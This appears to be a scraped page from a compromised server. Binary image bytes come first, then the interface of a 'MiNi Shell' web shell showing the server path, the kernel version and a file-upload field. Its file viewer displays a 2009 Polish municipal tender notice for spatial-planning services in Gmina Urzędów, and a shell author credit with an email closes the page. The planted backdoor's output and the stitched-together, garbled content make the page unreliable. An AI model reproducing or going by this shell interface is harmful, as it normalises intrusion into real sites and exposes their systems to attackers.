JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090921/160305-N-2009.html

<p class="kh_header"><b>Urzędów: Zmiana i aktualizacja studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów - zadanie nr I
Zmiana miejscowego planu zagospodarowania przestrzennego gminy Urzędów - zadanie nr II</b><br>
<b>Numer ogłoszenia: 160305 - 2009; data zamieszczenia: 21.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urzędów , ul. Rynek 26, 23-250 Urzędów, woj. lubelskie, tel. 081 8225052, faks 081 8285030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.urzedow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana i aktualizacja studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów - zadanie nr I
Zmiana miejscowego planu zagospodarowania przestrzennego gminy Urzędów - zadanie nr II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zamówienie obejmuje:

1.1   zgodnie z uchwałą Nr XXXI-245/2009 Rady Gminy Urzędów z dnia 28 sierpnia 2009r. zmianę studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Urzędów przyjętego Uchwałą Nr XXXIV - 245/2001 z dnia 26 listopada 2001r.  i zmienionego  Uchwałą
Nr XVII-156/2008 Rady Gminy Urzędów z dnia 30 maja 2008r.i  jego aktualizacja  - zadanie nr I

1.2   zgodnie z uchwałą Nr XXXI-244/2009  Rady Gminy Urzędów z dnia 28 sierpnia 2009r. zmianę miejscowego planu zagospodarowania przestrzennego gminy Urzędów  przyjętego uchwałą Nr X-68/2003 Rady Gminy z dnia 26 września 2003r , oraz zmiany do miejscowego planu zagospodarowania przestrzennego gminy Urzędów przyjęte uchwałą Nr XII-116/2007 Rady Gminy Urzędów z dnia 21.12.2007r. i uchwałą Nr XXVIII-230/2009 Rady Gminy Urzędów z dnia 4.06.2009r. , oraz działki których przekształcenie według analizy zasadności przystąpienia do zmian w planie wymaga zmiany studium, oznaczone w typologii wniosków  studium + plan załącznik nr 6 ( 64 wnioski - 93 działek) - zadanie nr II

1.3   granicami obszaru objętego projektem zmiany studium i jego aktualizacji jest teren w granicach administracyjnych gminy Urzędów, z uwzględnieniem wniosków stanowiących załącznik nr 1 do Uchwały Rady Gminy Urzędów w sprawie przystąpienia do zmiany studium. Powierzchnia gminy wynosi 11906 ha. (64 szt wniosków tj. 89 działek);

1.4   granice obszaru objętego projektem zmiany miejscowego planu -  teren zgodnie z wykazem działek i załącznikami graficznymi  nr 1 - 17 ( 29 wniosków tj. 36 działek) do uchwały Rady Gminy Urzędów w sprawie przystąpienia do zmian miejscowego planu tj. około 29 ha.
oraz działki których przekształcenie według analizy zasadności przystąpienia do zmian w planie wymaga zmiany studium, oznaczone w typologii wniosków  studium + plan, załącznik nr 6 ( 64 wnioski - 93 działek)

1.5 zmiana studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów i  zmiana miejscowego planu zagospodarowania przestrzennego Gminy Urzędów należy przeprowadzić i sporządzić zgodnie z ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80 poz. 717 z późn. zm.), oraz rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U. z 2004r.
 Nr 118, poz. 1233), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie zakresu projektu miejscowego planu zagospodarowania przestrzennego gminy (Dz.U. Nr 164, poz. 1587), ustawą z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska (Dz.U. z 2008r. nr 25 poz. 150), oraz innymi przepisami prawa obowiązującymi w tym zakresie, między innymi obowiązki wynikające z ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2008 Nr 199 poz. 1227).

Dokumenty posiadane przez zamawiającego
-  studium uwarunkowań i kierunków zagospodarowania przestrzennego  gminy przyjęte Uchwałą Nr XXXIV - 245/2001 z dnia 26 listopada 2001r. zmienione Uchwałą Nr XVII-156/2008 Rady Gminy Urzędów z dnia 30 maja 2008r.;
-  miejscowy  plan zagospodarowania przestrzennego gminy Urzędów  przyjęty uchwałą 
Nr X-68/2003 Rady Gminy z dnia 26 września 2003r , oraz zmiany do miejscowego planu zagospodarowania przestrzennego gminy Urzędów przyjęte uchwałą Nr XII-116/2007 Rady Gminy Urzędów z dnia 21.12.2007r. i uchwałą Nr XXVIII-230/2009 Rady Gminy Urzędów z dnia 4.06.2009r;
- analiza i zasadność przystąpienia do zmian w planie;
- ekofizjografia Gminy Urzędów
- kopie map zasadniczych i wypisy z rejestru gruntów dostarczy zamawiający
kod CPV -    71 41 00 00 -5 usługi planowania przestrzennego
2. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom.
Zamawiający żąda od wykonawców wskazania w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. Wykonawca określi zakres rzeczowy i finansowy tej części zamówienia. Brak informacji, bądź uzgodnienia z zamawiającym o zawarciu umowy z podwykonawcą wyklucza solidarną odpowiedzialność zamawiającego za zapłatę wynagrodzenia podwykonawcy , jak również wykonawca ponosi odpowiedzialność odszkodowawczą z tytułu  wykonania umowy w sposób sprzeczny z jej treścią, co daje podstawę zamawiającemu do odpowiedniego zastosowania przepisów art. 636  kodeksu cywilnego.
  3.   Zamawiający dopuszcza możliwość udzielenia zamówienia uzupełniającego dla zadania nr I, które nie może przekroczyć 50% wartości zamówienia podstawowego (zadania nr I) . 
 3.1   W przypadku wystąpienia potrzeby udzielenia zamówienia uzupełniającego którego wartość przekroczy 14 000 euro , zamawiający potraktuje je jako nowy przedmiot zamówienia, przeprowadzając procedurę zamówienia z wolnej ręki na podstawie art. 67. ust. 1 pkt 6, ustawy Prawo zamówień publicznych,  między innymi zaprosi wykonawcę  do negocjacji (art. 66), zamawiający złoży oświadczenia (art. 17), przed podpisaniem umowy uzyska oświadczenia od wykonawcy (art. 68.2, art. 22, art. 24), prowadzenie protokołu postępowania (art. 96), podpisze umowę w formie pisemnej (art. 139.2), oraz po zawarciu umowy umieści ogłoszenie na podstawie art. 95 ustawy Prawo zamówień publicznych.
3.2  W przypadku gdy wartość zamówienia uzupełniającego nie przekroczy kwoty 14 000 euro, zgodnie z art. 4 pkt 8  w tym zamówieniu nie stosujemy przepisów ustawy Prawo zamówień publicznych.
3.3  Zamawiający przewiduje skorzystanie z prawa opcji - art. 34 ust. 5 ustawy Prawo zamówień publicznych, w części przedmiotu zamówienia tj. działek  których przekształcenie według analizy zasadności przystąpienia do zmian w planie wymaga zmiany studium, oznaczone w typologii wniosków  studium + plan załącznik nr 6 
( 64 wnioski - 93 działek) - zadanie nr II . Skorzystanie z prawa opcji nastąpi w przypadku przekształcania działek  co do których nastąpi pozytywna zmiana studium. Wykonawca do obliczenia  ceny zobowiązany jest wziąć pod uwagę przedmiot zamówienia podstawowego i opcjonalną część zamówienia. 

4. Wymagania stawiane Wykonawcy:
  4.1 Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami wiedzy urbanistycznej i obowiązującego prawa,  jest odpowiedzialny za jakość, zakres i zgodność wykonania prac planistycznych z aktami prawa wymienionymi w p-cie 2,  ppk-t 2.5,  cz. IV - opisu przedmiotu zamówienia niniejszej siwz, zgodnie z którym zamawiający będzie  określać  jakość wykonanego opracowania. Wykonanie przedmiotu zamówienia w sposób wadliwy albo sprzeczny z umową skutkuje  odpowiedzialnością wykonawcy z art. 636 kodeksu cywilnego.
  4.2  Wykonawca jest zobowiązany do:
   -  zdobycia wszelkich informacji niezbędnych do prawidłowego przygotowania oferty,
   -  sprawdzenia i zweryfikowania dostarczonych materiałów oraz niezwłocznego
poinformowania Zamawiającego o ewentualnych błędach lub przeoczeniach;
Zamawiający nie będzie uwzględniał żadnych roszczeń i uwag, z tytułu błędów lub
nieścisłości specyfikacji istotnych warunków zamówienia , czy dostarczonych przez zamawiającego materiałów, po upływie terminu zgłaszania uwag i zapytań wynikających z art. 38 ustawy Prawo zamówień publicznych; 

 5. Wykonawca jest zobowiązany do zapoznania się z terenem objętym zakresem opracowania we własnym zakresie i ponosi z tym związane koszty.

6. Wymagania organizacyjne
Wykonawca jest zobowiązany w imieniu Wójta, do wykonania wszelkich czynności formalno - prawnych wynikających z art. 11  i art. 17 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym, do których  z mocy prawa jest zobowiązany Wójt ( nie obejmuje wysyłania korespondencji).
Zamawiający wymaga aby wykonawca opracował listę i uzasadnienia nieuwzględniania  w projekcie zmiany studium i zmiany planu wniosków i uwag.

7. Wymagania dotyczące rękojmi
Wykonawca rozszerza odpowiedzialność z tytułu rękojmi za wady w ten sposób, że okres rękojmi za wady kończy się po uzyskaniu pozytywnej oceny Wojewody Lubelskiego  dotyczącej zgodności zmiany studium i zmiany miejscowego planu z przepisami prawa, o wnioski wymagające ponowienia czynności w związku z uwzględnieniem uwag..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
 1)  na poświadczenie spełnienia tego warunku  dostarczyć aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zmówienia, albo terminu składania ofert. 

1.2	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw lub usług w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie  - według załącznika nr 3 
Zamawiający wymaga wykonania usług tj. conajmniej jednego opracowania miejscowego planu zagospodarowania przestrzennego lub zmiany planu dla terenu o powierzchni minimum 20 ha, oraz conajmniej jednego opracowania studium uwarunkowań i kierunków zagospodarowania przestrzennego lub zmiany studium  dla terenu o powierzchni conajmniej  6 000  ha.

2)   Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - aktualne zaświadczenie o wpisie na listę urbanistów głównego projektanta oraz projektanta sprawdzającego.

3)   Wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia,  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - zał. nr 4

4)   Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie wykonawca wskazał osoby, którymi będzie dysponował

1.3	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
    oświadczenie według załącznika nr 2 do siwz - o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych 

2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.

3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodną z ustawą
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6 zawiera błędy w obliczeniu ceny 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia, niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.1) Formularz ofertowy wg zał. nr 1- wypełniony i podpisany przez wykonawcę 
  A.2)   Wzór umowy - parafowany na każdej stronie   

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - według załącznika nr 2

  C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 


  C.1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw lub usług w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie  - według załącznika nr 3 
Zamawiający wymaga wykonania usług tj. conajmniej jednego opracowania miejscowego planu zagospodarowania przestrzennego lub zmiany planu dla terenu o powierzchni minimum 20 ha, oraz conajmniej jednego opracowania studium uwarunkowań i kierunków zagospodarowania przestrzennego lub zmiany studium  dla terenu o powierzchni conajmniej  6 000  ha.

C.2) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - aktualne zaświadczenie o wpisie na listę urbanistów głównego projektanta oraz projektanta sprawdzającego.

C.3) wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia,  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - zał. nr 4

C.4)  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie wykonawca wskazał osoby, którymi będzie dysponował

  D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - według załącznika nr 2

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

  E.1) Zamiast dokumentów, o których mowa w pkt. B.1), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt   E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

F.1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w punkcie B ppkt  B1 - B3  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   

  G. W celu potwierdzenia, że oferowane dostawy, usługi, lub roboty budowlane odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 

  Nie są wymagane dokumenty

H. Postanowienia dotyczące składanych dokumentów

H.1)  Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem  - za zgodność z oryginałem.

H.2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - termin realizacji zamówienia - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/urzedow.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Urzędów, ul. Rynek 26, 23-250 Urzędów
pokój nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2009 godzina 10:00, miejsce: Urząd Gminy Urzędów, ul. Rynek 26, 23-250 Urzędów, pokój nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 31.10.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com